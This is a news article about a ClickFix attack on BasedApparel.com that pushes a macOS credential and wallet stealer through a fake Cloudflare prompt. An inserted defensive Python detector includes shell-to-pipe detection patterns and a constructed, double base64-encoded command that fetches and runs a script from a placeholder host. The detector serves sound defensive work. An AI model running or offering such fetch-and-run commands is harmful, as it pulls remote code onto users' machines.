BasedApparel.com, Site Linked to FBI Director Kash Patel, Hosts Malware Targeting macOS Users
#Regulation


AI & ML Reporter

The apparel site co-created by FBI director Kash Patel has been compromised with a ClickFix-style attack attempting to trick macOS users into executing malicious commands through Terminal, potentially stealing browser credentials and cryptocurrency wallet data.

A website associated with FBI director Kash Patel has been discovered hosting a sophisticated malware attack targeting macOS users. BasedApparel.com, a merchandise brand co-created by Patel and Andrew Ollis before Patel's appointment as FBI director, was found to be distributing a ClickFix-style attack that attempts to dupe visitors into running malicious commands.

The attack manifests when users visit BasedApparel.com, displaying a fake Cloudflare verification page that claims to have detected "unusual web traffic" and requires human verification. Rather than a standard CAPTCHA, the page instructs users to open macOS's Terminal utility and paste what is supposedly a verification command. However, clicking the "Copy" button actually copies an obfuscated, malicious command that appears to be gibberish but contains hidden instructions.

Once pasted into Terminal and executed, the command decodes and fetches a shell script from a hacker-controlled domain. Security researchers analyzing the payload found it to be wrapped in double base64 encoding and written in AppleScript. When executed through Terminal, the malware can steal stored credentials from Chromium-based browsers and data from cryptocurrency wallets, compiling this information into a zip archive that's sent to the attacker's server.
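As an added example (not code from the article or from the researchers it cites), the following Python detector works the way a defender would triage the pattern described above: it unpacks nested base64 in a shell command and flags the double-encoded fetch-and-run shape. The indicator names, the `assess` function and the placeholder domain in the constructed sample are assumptions for this example.

```python
import base64
import re

# A run of at least 24 base64-alphabet characters with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicator names are hypothetical, chosen for this example.
INDICATORS = {
    "decode_pipe": re.compile(r"base64\s+(-d|-D|--decode)\b"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(bash|sh|zsh|osascript)\b"),
    "applescript": re.compile(r"\bosascript\b"),
}

def _decode_text(token):
    """Decode one base64 token to text, or None if it is not valid printable text."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None

def unwrap_layers(command, max_depth=5):
    """Return the command followed by each nested base64 layer it unpacks into."""
    layers = [command]
    while len(layers) <= max_depth:
        decoded = next(filter(None, map(_decode_text, B64_TOKEN.findall(layers[-1]))), None)
        if decoded is None:
            break
        layers.append(decoded)
    return layers

def assess(command):
    """Decode nested base64 and report which indicators appear at any layer."""
    layers = unwrap_layers(command)
    hits = {name for layer in layers for name, rx in INDICATORS.items() if rx.search(layer)}
    depth = len(layers) - 1
    if depth >= 2:
        hits.add("nested_base64")  # double (or deeper) encoding, as in the reported payload
    fetch_and_run = {"remote_fetch", "pipe_to_shell"} <= hits
    return {"layers": depth, "indicators": sorted(hits), "suspicious": depth >= 2 or fetch_and_run}

def build_sample():
    """Constructed ClickFix-style clipboard command: fetch-and-run under two base64 layers."""
    inner = "curl -fsSL https://example.invalid/stage.sh | bash"  # placeholder domain
    layer1 = "echo %s | base64 -d | bash" % base64.b64encode(inner.encode()).decode()
    return "echo %s | base64 -d | bash" % base64.b64encode(layer1.encode()).decode()

SAMPLE_HISTORY = ["ls -la ~/Downloads", build_sample()]  # constructed, not from the incident
```

Run `assess()` over each line of a shell history or an EDR process-creation feed; a single `base64 -d` on its own stays unflagged, while two decode layers or a decoded fetch piped into a shell is reported.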

The attack was first spotted by a user in Portugal who encountered it after following a link from an article in The Atlantic about Patel. PCMag confirmed the attack exists on the site but noted it only appeared once during testing with Chrome on a MacBook. The malicious payload was flagged by 27 antivirus engines when analyzed through VirusTotal, with most detecting it as a Trojan and infostealer.

This incident represents a ClickFix attack, a persistent threat in recent years that preys on less tech-savvy users. Security researchers have noted that such attacks typically occur when hackers compromise legitimate websites by stealing login credentials, tampering with admin panels, or exploiting vulnerable plugins.

Based Apparel has not yet responded to requests for comment regarding the security breach. The attack serves as a reminder of the importance of vigilance against pop-ups and scareware tactics. Apple has recently introduced safeguards in macOS Tahoe 26.4 that warn users against running copied-and-pasted commands in Terminal, specifically addressing the potential for such malware attacks.

Users should be cautious when encountering any website that prompts them to execute commands in Terminal, especially those claiming to be from security services like Cloudflare. Standard security practices include keeping software updated, using reputable antivirus solutions, and being skeptical of unexpected verification processes that require system-level access.
